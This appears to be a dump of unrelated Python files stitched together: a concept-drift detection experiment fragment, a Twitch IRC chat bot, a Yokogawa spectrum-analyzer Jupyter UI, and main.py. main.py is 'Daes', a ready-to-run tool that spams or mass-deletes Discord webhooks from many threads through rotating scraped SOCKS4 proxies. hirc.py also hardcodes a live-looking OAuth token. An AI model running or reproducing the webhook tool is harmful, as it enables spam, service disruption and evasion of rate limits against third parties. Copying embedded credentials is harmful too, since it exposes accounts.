Y_test_ = Y_test_[:, np.newaxis]
x_test, Y_test = make_blobs(n_samples=500, n_features=args.features, centers=centers, cluster_std=1.0)
Y_test = Y_test[:, np.newaxis]
if args.drift_type == 'gradual':
for i in [x * 0.1 for x in range(2, 12, 2)]:
x_, y_ = make_blobs(n_samples=100, n_features=args.features,
centers=linear_interp(centers_end, centers, i),
cluster_std=1.0)
y_ = y_[:, np.newaxis]
x_test = np.vstack([x_test, x_])
Y_test = np.vstack([Y_test, y_])
x_test = np.vstack([x_test, x_test_])
Y_test = np.vstack([Y_test, Y_test_])
Y_test = Y_test.squeeze(1)
t_start = 500
t_end = t_start
x_train, x_valid, Y_train, Y_valid = train_test_split(X, y, shuffle=True, test_size=0.2)
# Data Scaling
normalizer = StandardScaler()
x_train = normalizer.fit_transform(x_train)
x_valid = normalizer.transform(x_valid)
x_test = normalizer.transform(x_test)
# Encode labels
unique_train = np.unique(Y_train)
label_encoder = dict(zip(unique_train, range(len(unique_train))))
unique_test = np.setdiff1d(np.unique(y), unique_train)
label_encoder.update(dict(zip(unique_test, range(len(unique_train), len(np.unique(y))))))
Y_train = np.array([label_encoder.get(e, e) for e in Y_train])
Y_valid = np.array([label_encoder.get(e, e) for e in Y_valid])
Y_test = np.array([label_encoder.get(e, e) for e in Y_test])
else:
# RBF or UCI datasets with drift induced by corrupting the features
if args.dataset == 'RBF':
# Loading data
X, y = make_classification(n_samples=2000, n_features=args.features, n_informative=args.informative,
n_redundant=args.redundant, n_repeated=0, n_classes=args.classes,
n_clusters_per_class=1, weights=None, flip_y=0.0, class_sep=2., hypercube=True,
shift=0.0, scale=1.0, shuffle=True, random_state=args.init_seed)
else:
# UCI datasets
X, y = load_data(args.dataset)
x_train, x_test, Y_train, Y_test = train_test_split(X, y, shuffle=False, train_size=0.6)
x_train, x_valid, Y_train, Y_valid = train_test_split(x_train, Y_train, shuffle=False, test_size=0.2)
# scale data before corruption!!!
# Data Scaling
normalizer = StandardScaler()
x_train = normalizer.fit_transform(x_train)
x_valid = normalizer.transform(x_valid)
x_test = normalizer.transform(x_test)
# Encode labels
unique_train = np.unique(Y_train)
label_encoder = dict(zip(unique_train, range(len(unique_train))))
unique_test = np.setdiff1d(np.unique(y), unique_train)
label_encoder.update(dict(zip(unique_test, range(len(unique_train), len(np.unique(y))))))
Y_train = np.array([label_encoder.get(e, e) for e in Y_train])
Y_valid = np.array([label_encoder.get(e, e) for e in Y_valid])
Y_test = np.array([label_encoder.get(e, e) for e in Y_test])
# Induce Drift
test_samples = len(x_test)
if args.drift_type == 'step':
t_start = int(0.60 * test_samples)
t_end = t_start
x_test, permute_dict = induce_drift(x_test, y=Y_test, t_start=t_start, t_end=None, p=args.drift_p,
features=args.drift_features, copy=False)
elif args.drift_type == 'gradual':
t_start = int(0.60 * test_samples)
t_end = t_start + int(0.20 * test_samples)
# t_end = t_start
x_test, permute_dict = corrupt_drift(x_test, y=Y_test, t_start=t_start, t_end=t_end, p=args.drift_p,
features=args.drift_features, loc=1.0, std=1.0, copy=False)
classes = len(np.unique(Y_train))
print('Num Classes: ', classes)
print('Train:', x_train.shape, Y_train.shape, [(Y_train == i).sum() for i in np.unique(Y_train)])
print('Validation:', x_valid.shape, Y_valid.shape,
[(Y_valid == i).sum() for i in np.unique(Y_valid)])
print('Test:', x_test.shape, Y_test.shape,
[(Y_test == i).sum() for i in np.unique(Y_test)])
return x_train, Y_train, x_valid, Y_valid, x_test, Y_test, t_start, t_end
######################################################################################################
def single_experiment(args, path):
path = os.path.join(path, 'seed_{}'.format(args.init_seed))
saver = SaverSlave(path)
# Logging setting
print('run logfile at: ', os.path.join(saver.path, 'logfile.log'))
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(name)s: %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
filename=os.path.join(saver.path, 'logfile.log'),
filemode='a'
)
# Redirect stdout
stdout_logger = logging.getLogger('STDOUT')
slout = StreamToLogger(stdout_logger, logging.INFO)
sys.stdout = slout
# Redirect stderr
stderr_logger = logging.getLogger('STDERR')
slerr = StreamToLogger(stderr_logger, logging.ERROR)
sys.stderr = slerr
# Suppress output
if args.disable_print:
slout.terminal = open(os.devnull, 'w')
slerr.terminal = open(os.devnull, 'w')
######################################################################################################
# Loading data
x_train, Y_train, x_valid, Y_valid, x_test, Y_test, t_start, t_end = load_corrupt_data(args)
test_samples = len(x_test)
######################################################################################################
# Model definition
classes = len(np.unique(Y_train))
args.nbins = classes
model = MetaMLP(input_shape=x_train.shape[1], embedding_dim=args.embedding_size, n_class=classes,
hidden_neurons=args.neurons, hidd_act=eval(args.hidden_activation), dropout=args.dropout,
normalization=args.normalization, name='MLP').to(device)
nParams = sum([p.nelement() for p in model.parameters()])
s = 'MODEL: %s: Number of parameters: %s' % ('MLP', readable(nParams))
print(s)
######################################################################################################
# Main loop
train_dataset = TensorDataset(torch.from_numpy(x_train).float(), torch.from_numpy(Y_train).long())
valid_dateset = TensorDataset(torch.from_numpy(x_valid).float(), torch.from_numpy(Y_valid).long())
test_dateset = TensorDataset(torch.from_numpy(x_test).float(), torch.from_numpy(Y_test).long())
train_loader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, drop_last=False,
num_workers=args.num_workers, pin_memory=True)
valid_loader = DataLoader(valid_dateset, batch_size=args.batch_size, shuffle=False, drop_last=False,
num_workers=args.num_workers, pin_memory=True)
test_loader = DataLoader(test_dateset, batch_size=args.batch_size, shuffle=False, drop_last=False,
num_workers=args.num_workers, pin_memory=True)
######################################################################################################
if args.unconstrained:
loss_centroids = None
param_list = list(filter(lambda p: p.requires_grad, model.parameters()))
else:
loss_centroids = CentroidLoss(feat_dim=args.embedding_size, num_classes=classes, reduction='mean').to(device)
param_list = list(filter(lambda p: p.requires_grad, model.parameters())) + list(loss_centroids.parameters())
optimizer = torch.optim.SGD(param_list, lr=args.learning_rate, weight_decay=args.l2penalty, momentum=args.momentum)
criterion = nn.CrossEntropyLoss(reduction='none', weight=None)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=15, gamma=0.1)
# Train model
model, loss_centroids = train_model(model, train_loader, valid_loader, latent_constraint=loss_centroids,
epochs=args.epochs, optimizer=optimizer,
scheduler=scheduler, criterion=criterion,
saver=saver, plot_loss_flag=args.plt_loss)
print('Train ended')
######################################################################################################
# Eval
train_loader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=False, drop_last=False,
num_workers=args.num_workers, pin_memory=True)
train_results = evaluate_model(model, train_loader, Y_train, saver=saver, network='MLP', datatype='Train',
plt_cm=args.plt_cm, plt_pred=False)
valid_results = evaluate_model(model, valid_loader, Y_valid, saver=saver, network='MLP', datatype='Valid',
plt_cm=args.plt_cm, plt_pred=False)
test_results = evaluate_model(model, test_loader, Y_test, saver=saver, network='MLP', datatype='Test',
plt_cm=args.plt_cm, plt_pred=True)
# Embeddings
train_embedding = predict(model.encoder, train_loader).squeeze()
valid_embedding = predict(model.encoder, valid_loader).squeeze()
test_embedding = predict(model.encoder, test_loader).squeeze()
# Get centroids position
if args.unconstrained:
cc = []
for i in range(len(np.unique(Y_train))):
cc.append(train_embedding[Y_train == i].mean(axis=0))
cluster_centers = np.array(cc)
else:
cluster_centers = loss_centroids.centers.detach().cpu().numpy()
if train_embedding.shape[1] <= 3:
plot_embedding(train_embedding, valid_embedding, Y_train, Y_valid, cluster_centers, classes=classes,
saver=saver,
figname='Train data')
plot_embedding(valid_embedding, test_embedding, Y_valid, Y_test, cluster_centers, classes=classes, saver=saver,
figname='Test (drift) data')
else:
print('Skipping embedding plot')
######################################################################################################
# Begin Drift detection part
######################################################################################################
# Test predictions
yhat_ = predict(model, test_loader)
yhat = yhat_.argmax(axis=1)
y_binary = (yhat == Y_test).astype(int)
y_binary = 1 - y_binary
# Running accuracy
w = 50
running_accuracy = np.empty(test_samples)
for t in range(test_samples):
if t < w:
score = accuracy_score(yhat[:t], Y_test[:t])
else:
score = accuracy_score(yhat[t - w:t], Y_test[t - w:t])
running_accuracy[t] = score
# First sample will be NaN
running_accuracy[0] = running_accuracy[1]
# Check other nans and fill with zero
if np.isnan(running_accuracy).any():
running_accuracy[np.where(np.isnan(running_accuracy))[0]] = 0
n = len(running_accuracy)
plt.figure()
plt.plot([x for x in range(n)], running_accuracy)
for t in (t_start, t_end):
plt.axvline(t, linestyle='-.', c='blue')
plt.title(f'running accuracy (Winsize={w})')
plt.tight_layout()
saver.save_fig(plt.gcf(), 'running_acc')
# plt.show(block=True)
######################################################################################################
df = pd.DataFrame()
detectors = ['ZScore', 'IRQ', 'P_modified', 'EMA', 'HDDDM_Emb', 'HDDDM_Input', 'IKS_emb',
'DDM', 'EDDM', 'ADWIN']
for d in args.drift_history:
skip_flag = False
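# Evaluate each (history d, threshold c) pair once; after the first pair with d * c * 0.01 <= 1 has run,
# later pairs that also satisfy it are skipped (they presumably collapse to the same effective configuration).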
for c in args.drift_th:
if skip_flag and d * c * 0.01 <= 1:
continue
df_results, drift_idxs, warning_idxs, obj = detection_helper(x_valid, x_test, valid_embedding,
test_embedding, y_binary, running_accuracy,
cluster_centers,
saver, d, c, t_start, t_end, args,
detectors_list=args.detectors)
if d * c * 0.01 <= 1:
skip_flag = True
df = pd.concat([df, df_results])  # DataFrame.append was deprecated and removed in pandas 2.x
# Complete dataframe
df['train_acc'] = train_results['acc']
df['valid_acc'] = valid_results['acc']
df['drift_acc'] = test_results['acc']
df['dataset'] = args.dataset
df['constrained'] = str(not args.unconstrained)
df['features'] = args.drift_features
df.to_csv(os.path.join(saver.path, 'results_df.csv'), sep=',', index=False)
plt.close('all')
# g = sns.relplot(data=df, y='drift_delay', x='drift_false_positive', hue='name', style='detection_winsize',
# col='counter', palette='Paired', kind='scatter', markers=True, dashes=False, sizes=10)
# plt.savefig(os.path.join(saver.path, 'final.png'), bbox_inches='tight')
# g = sns.relplot(data=df, y='drift_delay', x='drift_false_positive', hue='name', style='counter',
# col='detection_winsize', palette='Paired', kind='scatter', markers=True, dashes=False, sizes=10)
# plt.savefig(os.path.join(saver.path, 'final2.png'), bbox_inches='tight')
return df
if __name__ == '__main__':
args = parse_args()
print(args)
print()
######################################################################################################
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
SEED = args.init_seed
np.random.seed(SEED)
torch.manual_seed(SEED)
if device.type == 'cuda':  # device is a torch.device; comparing it to the string 'cuda' is unreliable
torch.cuda.manual_seed(SEED)
if args.headless:
print('Setting Headless support')
plt.switch_backend('Agg')
else:
backend = 'Qt5Agg'
print('Switching matplotlib backend to', backend)
plt.switch_backend(backend)
print()
######################################################################################################
# LOG STUFF
# Declare saver object
if args.dataset == 'MovRBF':
saver = Saver(OUTPATH, os.path.basename(__file__).split(sep='.py')[0],
hierarchy=os.path.join(args.dataset,
args.drift_type,
str(not args.unconstrained)))
else:
saver = Saver(OUTPATH, os.path.basename(__file__).split(sep='.py')[0],
hierarchy=os.path.join(args.dataset,
args.drift_type,
args.drift_features,
str(not args.unconstrained)))
# Save json of args/parameters
with open(os.path.join(saver.path, 'args.json'), 'w') as fp:
json.dump(vars(args), fp, indent=4)
######################################################################################################
# Main loop
csv_path = os.path.join(saver.path, '{}_{}_results.csv'.format(args.dataset, args.drift_features))
seeds_list = list(np.random.choice(1000, args.n_runs, replace=False))
seeds_list = check_ziplen(seeds_list, args.process)
total_run = args.n_runs
iterator = zip(*[seeds_list[j::args.process] for j in range(args.process)])
total_iter = len(list(iterator))
torch.multiprocessing.set_start_method('spawn', force=True)
start_datetime = datetime.now()
print('{} - Start Experiments. {} parallel process. Single GPU. \r\n'.format(
start_datetime.strftime("%d/%m/%Y %H:%M:%S"), args.process))
for i, (x) in enumerate(zip(*[seeds_list[j::args.process] for j in range(args.process)])):
start_time = time.time()
x = remove_duplicates(x)
n_process = len(x)
idxs = [i * args.process + j for j in range(1, n_process + 1)]
print('/' * shutil.get_terminal_size().columns)
print(
'ITERATION: {}/{}'.format(idxs, total_run).center(shutil.get_terminal_size().columns))
print('/' * shutil.get_terminal_size().columns)
process = []
for j in range(n_process):
process.append(mp.Process(target=run, args=(x[j], copy.deepcopy(args), saver.path, csv_path)))
for p in process:
p.start()
for p in process:
p.join()
end_time = time.time()
iter_seconds = end_time - start_time
total_seconds = end_time - start_datetime.timestamp()
print('Iteration time: {} - ETA: {}'.format(time.strftime("%Mm:%Ss", time.gmtime(iter_seconds)),
time.strftime('%Hh:%Mm:%Ss',
time.gmtime(
total_seconds * (total_iter / (i + 1) - 1)))))
print()
print('*' * shutil.get_terminal_size().columns)
print('DONE!')
end_datetime = datetime.now()
total_seconds = (end_datetime - start_datetime).total_seconds()
print('{} - Experiment took: {}'.format(end_datetime.strftime("%d/%m/%Y %H:%M:%S"),
time.strftime("%Hh:%Mm:%Ss", time.gmtime(total_seconds))))
print(f'results dataframe saved in: {csv_path}')
|
main.py
|
import os
import ctypes
import requests
import time
import random
import json
import threading
from colorama import Fore, init
init(autoreset=True)
if os.name == "nt":
os.system("mode con: cols=138 lines=30")
locker = threading.Lock()
proxies_list = []
def title(text):
if os.name == "nt":
ctypes.windll.kernel32.SetConsoleTitleW(f"Daes | By Goldfire | {text}")
else:
print(f"\33]0;Daes | By Goldfire | {text}\a", end="", flush=True)
def logo():
if os.name == "nt":
os.system("cls")
else:
os.system("clear")
print(f"""{Fore.LIGHTBLUE_EX}
▓█████▄ ▄▄▄ ▓█████ ██████
▒██▀ ██▌▒████▄ ▓█ ▀ ▒██ ▒
░██ █▌▒██ ▀█▄ ▒███ ░ ▓██▄
░▓█▄ ▌░██▄▄▄▄██ ▒▓█ ▄ ▒ ██▒
░▒████▓ ▓█ ▓██▒░▒████▒▒██████▒▒
▒▒▓ ▒ ▒▒ ▓▒█░░░ ▒░ ░▒ ▒▓▒ ▒ ░
░ ▒ ▒ ▒ ▒▒ ░ ░ ░ ░░ ░▒ ░ ░
░ ░ ░ ░ ▒ ░ ░ ░ ░
░ ░ ░ ░ ░ ░
░
{Fore.LIGHTYELLOW_EX}Destroying webhooks has never been {Fore.LIGHTGREEN_EX}easier{Fore.LIGHTYELLOW_EX}.
{Fore.RESET}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n
""")
def proxies_scraper():
global proxies_list
while True:
response = requests.get("https://api.proxyscrape.com/v2/?request=getproxies&protocol=socks4&timeout=10000&country=all&simplified=true")
proxies_list = response.text.splitlines()
time.sleep(60)
def proxies_random():
proxy = random.choice(proxies_list)
proxies = {
"http": f"socks4://{proxy}",
"https": f"socks4://{proxy}"
}
return proxies
def spammer(use_proxies, url, username, avatar_url, message):
while True:
try:
if use_proxies == "y":
proxy = proxies_random()
else:
proxy = {
"http": None,
"https": None
}
response = requests.post(url, json={"username": username, "avatar_url": avatar_url, "content": message}, proxies=proxy)
if response.status_code != 204:
if response.status_code == 404:
locker.acquire()
print(f"{Fore.LIGHTRED_EX}[Invalid Webhook] {url.split('webhooks/')[1]}")
locker.release()
break
elif response.status_code == 429:
time.sleep(float(json.loads(response.content)['retry_after'] / 1000))
else:
locker.acquire()
print(f"{Fore.LIGHTRED_EX}[Unknown Error - {response.status_code}] {url.split('webhooks/')[1]}")
locker.release()
else:
locker.acquire()
print(f"{Fore.LIGHTGREEN_EX}[Success] {url.split('webhooks/')[1]}")
locker.release()
except:
pass
def deleter(use_proxies, url):
global success, errors
request_sent = False
while not request_sent:
try:
if use_proxies == "y":
proxy = proxies_random()
else:
proxy = {
"http": None,
"https": None
}
response = requests.delete(url, proxies=proxy, timeout=5)
request_sent = True
if response.status_code != 204:
errors += 1
if response.status_code == 404:
locker.acquire()
print(f"{Fore.LIGHTRED_EX}[Invalid Webhook] {url.split('webhooks/')[1]}")
locker.release()
else:
success += 1
locker.acquire()
print(f"{Fore.LIGHTGREEN_EX}[Success] {url.split('webhooks/')[1]}")
locker.release()
if success + errors == total_url:
title("Deleting - Finished")
logo()
print(f"{Fore.LIGHTGREEN_EX}{success} webhooks have been deleted with success.")
print(f"{Fore.LIGHTRED_EX}{errors} webhooks encountered errors while deleting them.")
time.sleep(5)
init()
except:
pass
def init():
global total_url, success, errors
title("Initialization")
logo()
print(f"{Fore.LIGHTMAGENTA_EX}Do you want to spam webhook? (y/n if you want to delete)")
spam_webhooks = input("\n~# ").lower()
logo()
print(f"{Fore.LIGHTMAGENTA_EX}Do you want to destroy multiple webhooks? (y/n)")
multiple_webhooks = input("\n~# ").lower()
if multiple_webhooks == "n":
logo()
print(f"{Fore.LIGHTMAGENTA_EX}Enter Webhook URL you want to destroy.")
url = input("\n~# ")
else:
logo()
print(f"{Fore.LIGHTMAGENTA_EX}Enter file name that contains webhooks. (with .txt)")
webhooks_file = input("\n~# ")
if spam_webhooks == "y":
logo()
print(f"{Fore.LIGHTMAGENTA_EX}Enter webhook's username.")
username = input("\n~# ")
logo()
print(f"{Fore.LIGHTMAGENTA_EX}Enter webhook's avatar URL. (Empty for no avatar)")
avatar_url = input("\n~# ")
logo()
print(f"{Fore.LIGHTMAGENTA_EX}Enter message you want to spam.")
message = input("\n~# ")
logo()
print(f"{Fore.LIGHTMAGENTA_EX}How many threads?")
try:
threads_count = int(input("\n~# "))
except:
logo()
print(f"{Fore.LIGHTRED_EX}[Error] Invalid threads count.")
time.sleep(5)
init()
logo()
print(f"{Fore.LIGHTMAGENTA_EX}Do you want to use proxies? (Recommanded, y/n)")
use_proxies = input("\n~# ").lower()
if spam_webhooks == "y":
title("Spamming")
logo()
if use_proxies == "y":
threading.Thread(target=proxies_scraper).start()
while len(proxies_list) == 0:
time.sleep(0.5)
if multiple_webhooks == "n":
for i in range(0, threads_count):
threading.Thread(target=spammer, args=(use_proxies, url, username, avatar_url, message)).start()
else:
with open(webhooks_file) as file:
for line in file:
for i in range(0, threads_count):
threading.Thread(target=spammer, args=(use_proxies, line.rstrip(), username, avatar_url, message)).start()
file.close()
else:
title("Deleting")
logo()
if use_proxies == "y":
threading.Thread(target=proxies_scraper).start()
while len(proxies_list) == 0:
time.sleep(0.5)
success = 0
errors = 0
if multiple_webhooks == "n":
total_url = 1
threading.Thread(target=deleter, args=(use_proxies, url,)).start()
else:
total_url = len(open(webhooks_file).readlines())
with open(webhooks_file) as file:
for line in file:
threading.Thread(target=deleter, args=(use_proxies, line.rstrip(),)).start()
file.close()
if __name__ == "__main__":
try:
init()
except KeyboardInterrupt:
exit()
|
hirc.py
|
import os
import sys
import time
import threading
import irc_bot_noblock
from datetime import datetime
# change it to your own
# get your oauth here: https://twitchapps.com/tmi/
nickname = 'twitch_plays_3ds'
oauth = 'oauth:qmdwk3rsm4qau59zf2dpxixsf4wxzf'
def ensure_dir(dir_path):
if not os.path.exists(dir_path):
print("creating directory " + dir_path)
os.makedirs(dir_path)
def worker():
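# Background thread: blocks on stdin and stores the typed line in last_message for the main loop to send to chat.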
global last_message
while 1:
last_message = input()
time.sleep(0.01)
def safe_print(item):
try:
print(item)
except Exception:
print(item.encode('utf-8'))
def log_msg(name, msg):
msg = msg.replace('\r', '').replace('\n', '')
with open('./comment_log/' + chat_channel + ".txt", mode='a', encoding='utf-8') as log_file:
log_file.write(datetime.utcnow().isoformat(sep='T') + "Z " + name + ': ' + msg + '\r\n')
if(len(sys.argv) != 2):
print('usage: ' + __file__ + ' chat_channel')
exit()
ensure_dir('./comment_log')
last_message = ''
chat_channel = sys.argv[1].lower().lstrip().rstrip()
chat_server = ['irc.chat.twitch.tv', 6667]
bot = irc_bot_noblock.irc_bot(nickname, oauth, chat_channel, chat_server[0], chat_server[1], timeout=300)
bot.connect()
t = threading.Thread(target=worker)
t.start()
while 1:
tmi_list = bot.get_parsed_message()
tmi_list.reverse()
for item in [x for x in tmi_list if "." not in x.username]:
message_orig = item.message.replace(chr(1) + "ACTION", "/me").replace(chr(1), '').lstrip().rstrip()
log_msg(item.username, message_orig)
safe_print(item.username + ": " + message_orig)
if last_message != '':
safe_print(">> " + nickname + ": " + last_message)
bot.send_message(last_message)
log_msg(nickname, last_message)
last_message = ''
time.sleep(0.01)
|
_OSA_Jupyter-checkpoint.py
|
import numpy as np
import threading
import os
import plotly.graph_objects as go
import pandas as pd
import sys
import re
from scipy import constants as cts
from IPython.display import display, HTML
import time
work_dir = os.path.join(os.path.dirname(__file__), '../')
work_dir = os.path.abspath(work_dir)
path = os.path.abspath(work_dir + '/../')
if not work_dir in sys.path:
sys.path.insert(0, work_dir)
from pyOSA import Yokogawa
from pyOSA import uiOSA
# if len(sys.argv)>1:
# DEBUG = bool(re.search('true', sys.argv[0].lower()))
# print(f'Debugging: {DEBUG}')
# else:
# DEBUG = False
# DEBUG = False
# print(DEBUG)
class OSAjupyter(uiOSA):
OSAmodel = {'AQ6375B': dict(span=[1200.0, 2400.0]),
'AQ6374': dict(span=[350.0, 1750.0]),
'AQ6370D': dict(span=[600.0, 1700.0])}
def __init__(self, **kwargs):
super().__init__()
self.DEBUG = kwargs.get('DEBUG', False)
if self.DEBUG:
print('Debugging mode ON')
self.createUI()
self.connected = False
self._id_trace = 0
self._scan = False
# -- connect the button --
self._connectUI()
def connect(self, change):
ip = self.ui.ip.value
if change.new:
try_connect = 0
while try_connect < 5:
with Yokogawa(ip=ip) as osa:
# -- fetch the OSA state
if osa.connected:
try_connect += 1
print(try_connect)
identity = osa.identity
if self.DEBUG:
print(f'Model:{identity}')
print(f'Model:{self.OSAmodel}')
print(f"Model:{self.OSAmodel[identity['model']]}")
if self.DEBUG:
print('Connected to the OSA')
try:
para = osa.settings
if self.DEBUG:
print('Fetched parameters')
except Exception as err:
print(err)
trace = osa.trace
if self.DEBUG:
print('Fetched traces')
break
else:
try_connect += 1
print('Did not connect, retrying...')
time.sleep(0.5)
self.figOSA.data[0].x = []
self.figOSA.data[0].y = []
# time.sleep(1)
# close the socket, no need anymore
# -- updating the UI
if try_connect >=5:
print("Couldn't connect to the OSA, please check the IP")
else:
self.connected = True
if self.DEBUG:
print('Finished Connecting')
model = identity['model']
if self.DEBUG:
print(f"Model: {model}")
self.ui.model.value = f"Maker: {identity['maker']}\n" + \
f"Model: {model}\n" + \
f"SN: {identity['SN']}\n\n" + \
f"Spectral range:\n\t {self.OSAmodel[model]['span'][0]}nm - {self.OSAmodel[model]['span'][1]}nm\n"
lbd_start = para['centwlgth'] - para['span']/2
lbd_end = para['centwlgth'] + para['span']/2
if self.DEBUG:
print(f'Start: {lbd_start}')
print(f'End: {lbd_end}')
self.ui.λ.min = self.OSAmodel[model]['span'][0]
self.ui.λ.max = self.OSAmodel[model]['span'][1]
self.ui.λ.value = (1e9*lbd_start, 1e9*lbd_end)
try:
self.ui.bandwidth.value = self._Bdwt_val[1e9*para['bdwdth']]
except Exception as err:
if self.DEBUG:
print(f'Bandwidth Error: {err}')
print(f"Value: {1e9*para['bdwdth']}")
try:
self.ui.res.index = int(para['resol'])
except Exception as err:
if self.DEBUG:
print(f'Res Error: {err}')
print(f"Value: {para['resol']}")
try:
self.ui.pts.value = int(para['pts'])
except Exception as err:
if self.DEBUG:
print(f'Pts Error: {err}')
print(f"Value: {para['pts']}")
self.figOSA.data[0].x = trace.lbd.values*1e9
self.figOSA.data[0].y = trace.S.values
self.figOSA.update_xaxes(autorange = True)
self.figOSA.update_xaxes(autorange = False)
self.figOSA.update_xaxes(range = [self.figOSA.layout.xaxis.range[0],
self.figOSA.layout.xaxis.range[1]])
self.figOSA.update_yaxes(autorange = True)
time.sleep(0.2)
self.figOSA.update_yaxes(autorange = False)
self.figOSA.update_yaxes(range = [-59, self.figOSA.layout.yaxis.range[-1]])
time.sleep(0.5)
self.figOSA.update_yaxes(range = [-85, self.figOSA.layout.yaxis.range[-1]])
else:
self.connected = False
def refreshTrace(self, change):
ip = self.ui.ip.value
if self.connected:
with Yokogawa(ip=ip) as osa:
if osa.connected:
trace = osa.trace
x = trace.lbd*1e9
y = trace.S
if self.ui.freq_scale.value.lower() == 'frequency':
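# Convert wavelength [nm] to frequency [THz]: f = 1e-12 * c / (lambda * 1e-9)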
x = 1e-12*cts.c/(x*1e-9)
self.figOSA.data[0].x = x
self.figOSA.data[0].y = trace.S
def _stopScan(self):
self._scan = False
ip = self.ui.ip.value
print(ip)
time.sleep(0.5)
with Yokogawa(ip=ip) as osa:
osa.scan = 'stop'
print('stopped')
self._scan = False
def _singleScan(self):
self._scan = True
ip = self.ui.ip.value
with Yokogawa(ip=ip) as osa:
self.figOSA.data[0].x = []
self.figOSA.data[0].y = []
osa.scan = 'single'
print('Launching a single scan')
while True:
print('getting traces')
time.sleep(0.01)
trace = osa.trace
if trace is not None:  # the trace is DataFrame-like, so an explicit None check avoids ambiguous truthiness
x = trace.lbd*1e9
y = trace.S
if self.ui.freq_scale.value.lower() == 'frequency':
x = 1e-12*cts.c/(x*1e-9)
self.figOSA.data[0].x = x
self.figOSA.data[0].y = trace.S
else:
print(trace)
time.sleep(0.25)
if self._scan == False:
print('!!!stop the loop!!!')
break
def _repeatScan(self):
self._scan = True
ip = self.ui.ip.value
with Yokogawa(ip=ip) as osa:
print('Launching a Continuous scan')
self.figOSA.data[0].x = []
self.figOSA.data[0].y = []
osa.scan = 'repeat'
print('Launching a Continuous scan')
while True:
time.sleep(0.01)
trace = osa.trace
if trace is not None:
x = trace.lbd*1e9
y = trace.S
if self.ui.freq_scale.value.lower() == 'frequency':
x = 1e-12*cts.c/(x*1e-9)
self.figOSA.data[0].x = x
self.figOSA.data[0].y = trace.S
else:
time.sleep(0.25)
if self._scan == False:
print('!!!stop the loop!!!')
break
def scanType(self, change):
print(change.new.lower())
if change.new.lower() == 'stop':
self._stopScan()
if not self._scan:
if change.new.lower() == 'single':
t = threading.Thread(target=self._singleScan)
t.start()
if change.new.lower() == 'repeat':
t = threading.Thread(target=self._repeatScan)
t.start()
def select_trace(self, change):
ip = self.ui.ip.value
if self.connected:
with Yokogawa(ip=ip) as osa:
osa.trace = change.new.replace('Trace ', '')
def update_λ(self, change):
ip = self.ui.ip.value
if self.connected:
# print(change.new)
centwlgth = (change.new[1] + change.new[0])/2
span = (change.new[1] - change.new[0])
time.sleep(1)
with Yokogawa(ip=ip) as osa:
para = osa.settings
if self.DEBUG:
print(para)
para['centwlgth'] = centwlgth*1e-9
para['span'] = span*1e-9
if self.DEBUG:
print(para)
with Yokogawa(ip=ip) as osa:
osa.settings = para
self.figOSA.update_xaxes(range = change.new)
def update_res(self, change):
ip = self.ui.ip.value
if self.connected:
with Yokogawa(ip=ip) as osa:
para = osa.settings
para['resol'] = change.new
with Yokogawa(ip=ip) as osa:
osa.settings = para
def update_bdwt(self, change):
ip = self.ui.ip.value
if self.connected:
with Yokogawa(ip=ip) as osa:
para = osa.settings
para['bdwdth'] = float(change.new.replace(' nm', ''))*1e-9
with Yokogawa(ip=ip) as osa:
osa.settings = para
para = osa.settings
self.ui.bandwidth.value = self._Bdwt_val[1e9*para['bdwdth']]
def update_points(self, change):
ip = self.ui.ip.value
if self.connected:
with Yokogawa(ip=ip) as osa:
para = osa.settings
para['pts'] = change.new
with Yokogawa(ip=ip) as osa:
osa.settings = para
para = osa.settings
self.ui.pts.value = int(para['pts'])
def clear_all_trace(self, change):
self._id_trace = 0
self.figOSA.data = [self.figOSA.data[0]]
self.figOSA.data[0].x = []
self.figOSA.data[0].y = []
def clear_keep_trace(self, change):
self._id_trace = 0
self.figOSA.data = [self.figOSA.data[0]]
def keep_trace(self, change):
self._id_trace += 1
print('Keeping trace')
tr = go.Scatter(x = self.figOSA.data[0].x,
y = self.figOSA.data[0].y)
self.figOSA.add_trace(tr)
print('Trace kept')
def freq_scale(self, change):
print(change.new.lower())
xdata = [None]*len(self.figOSA.data)
newx = [None]*len(self.figOSA.data)
for ii in range(len(self.figOSA.data)):
xdata[ii] = self.figOSA.data[ii].x
if change.new.lower() == 'frequency':
for ii in range(len(self.figOSA.data)):
newx[ii] = 1e-12 * cts.c/(xdata[ii]*1e-9)
xlabel = 'Frequency (THz)'
elif change.new.lower() == 'wavelength':
for ii in range(len(self.figOSA.data)):
newx[ii] = 1e9 * cts.c/(xdata[ii]*1e12)  # convert THz back to nm
xlabel = 'Wavelength (nm)'
for ii in range(len(self.figOSA.data)):
self.figOSA.data[ii].x = newx[ii]
self.figOSA.update_xaxes(title = xlabel, range = [np.min(newx), np.max(newx)])
# print(change.new)
# if change.new:
# newx = 1e-12 * cts.c/(xdata*1e-9)
# xlabel = 'Frequency (THz)'
# else:
# newx = 1e9 * cts.c/(xdata*1e12)
# xlabel = 'Wavelength (nm)'
#
# self.figOSA.data[0].x = newx
# # figOSA.data[0].y = ydata
# self.figOSA.update_xaxes(title = xlabel, range = [newx.min(), newx.max()])
# #
def save_data(self, change):
ip = self.ui.ip.value
fname = self.ui.picker.selected
if fname:
if not os.path.exists(self.ui.picker.selected):
if self.ui.to_save.value.lower() == 'pc':
lbd = self.figOSA.data[0].x*1e-9
S = self.figOSA.data[0].y
df = pd.DataFrame(dict(lbd = lbd, S = S))
if len(self.figOSA.data) > 1:
for ii in range(1, len(self.figOSA.data)):
lbd = self.figOSA.data[ii].x*1e-9  # use trace ii, not trace 0
S = self.figOSA.data[ii].y
dum = pd.DataFrame({f'lbd{ii}': lbd, f'S{ii}': S})
df = pd.concat([df, dum], axis = 1)
df.to_parquet(fname)
else:
with Yokogawa(ip=ip) as osa:
if osa.connected:
trace = osa.trace
save_ok = True
else:
save_ok = False
print("Cannot coonect!!")
if save_ok:
trace.to_parquet(fname)
def _connectUI(self):
self.ui.cnct.observe(self.connect, 'value')
# self.ui.scan.observe(self.scan_osa,'value')
